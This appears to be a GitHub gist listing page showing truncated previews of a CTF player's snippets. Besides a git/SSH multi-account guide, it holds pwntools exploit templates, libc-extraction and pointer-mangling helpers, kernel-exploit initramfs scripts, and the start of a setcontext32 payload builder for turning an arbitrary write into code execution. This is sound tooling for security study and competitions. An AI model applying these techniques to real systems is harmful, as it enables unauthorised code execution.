Skip to content

Instantly share code, notes, and snippets.

View k4lizen's full-sized avatar

k4lizen

8 followers · 5 following
View GitHub Profile
@k4lizen
k4lizen / multiple_git.md
Last active November 28, 2024 15:44
How to manage multiple git accounts with SSH

How to manage multiple git accounts (with SSH)

Guide for windows. Should apply similarly elsewhere. We will use SSH. If you only care about github, check these out: cli/cli#326 & https://github.com/cli/cli/releases/tag/v2.40.0.

The git side

When making a commit, the username and email tagged with the commit are the ones specified in git config user.name and git config user.email. For github at least (but probably for everything else as well), your email is used as your identifier, which connects you as the commit author to your profile on the hosting service.

I like to keep my email private, so the email I connect with my commits to github projects with is the noreply one provided by github. It can be found in github -> Settings -> Emails and looks like [email protected] the number at the beginning being the essentially only important part. If you change the name after the +, github will still recognize it as you, as long as the numbers ar

@k4lizen
k4lizen / lexploit.py
Last active March 31, 2024 13:54
Binary Exploitation template with custom LIBC
#!/usr/bin/env python
from pwn import *
def start():
if args.GDB or args.DBG:
return gdb.debug([ld.path, elff.path], gdbinit, aslr=using_aslr, env={"LD_PRELOAD": libc.path})
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2])
return process([ld.path, elff.path], aslr=using_aslr, env={"LD_PRELOAD": libc.path})
@k4lizen
k4lizen / exploit.py
Last active July 20, 2024 07:26
Binary Exploitation template
#!/usr/bin/env python
from pwn import *
HOST = "example.com"
PORT = 1337
using_aslr = False
exe = context.binary = ELF('./chal', checksec=False)
# libc = ELF('./libc.so.6', checksec=False)
# ld = ELF('./ld-linux-x86-64.so.2', checksec=False)
@k4lizen
k4lizen / libc-from-dockerfile.sh
Created March 15, 2024 17:27
Get LIBC and intrepreter from Dockerfile
#!/bin/sh
# dependencies: docker and https://github.com/BurntSushi/ripgrep
libc_renamed=libc.so.6
ldlinux_renamed=ld-linux.so
if distro=$(rg -or '$1$2' -- '(?:--from=|FROM )(debian|ubuntu)(\S+)?' Dockerfile); then
if container=$(docker container create "$distro"); then
if libs=$(docker run "$distro" ldd /bin/true); then
libs=$(printf %s "$libs" | awk 'NF == 4 {print $3}; NF == 2 {print $1}')
for lib in $libs; do
case $lib in
@k4lizen
k4lizen / elf.py
Created April 12, 2024 01:15
elf.py script for elfcrafting
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# mayhem/datatypes/elf.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
@k4lizen
k4lizen / setcontext32.py
Last active April 13, 2024 02:59
setcontext32 payload to turn arbitrary write to RCE
# from https://hackmd.io/@pepsipu/SyqPbk94a
from pwn import *
def create_ucontext(
src: int,
rsp=0,
rbx=0,
rbp=0,
r12=0,
r13=0,
@k4lizen
k4lizen / libc_call.py
Created April 21, 2024 12:23
Using libc (rand, srand) etc using python
from ctypes import CDLL
libc = CDLL("libc.so.6")
now = int(floor(time.time()))
libc.srand(now)
print(libc.rand())
@k4lizen
k4lizen / ptrmangle.py
Last active May 3, 2024 17:29
glibc pointer (de)mangling
# for exit funcs
def shift_right_carry(number: int, shift_amount: int) -> int:
for i in range(shift_amount):
if (number & 1) == 0:
number = number >> 1
else:
number = (number >> 1) | 0x8000000000000000
return number
def shift_left_carry(number: int, shift_amount: int) -> int:
@k4lizen
k4lizen / decompress.sh
Last active July 12, 2024 15:07
kernel pwn: Decompress a .cpio.gz file system (initramfs)
#!/bin/bash
# Decompress a .cpio.gz packed file system
rm -rf ./initramfs
mkdir initramfs
cd initramfs
cp ../initramfs.cpio.gz .
gunzip ./initramfs.cpio.gz
cpio -idm < ./initramfs.cpio
rm initramfs.cpio
echo "Done"
@k4lizen
k4lizen / compress.sh
Last active July 12, 2024 14:42
kernel pwn: Compress initramfs with statically linked exploit
#!/bin/bash
# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd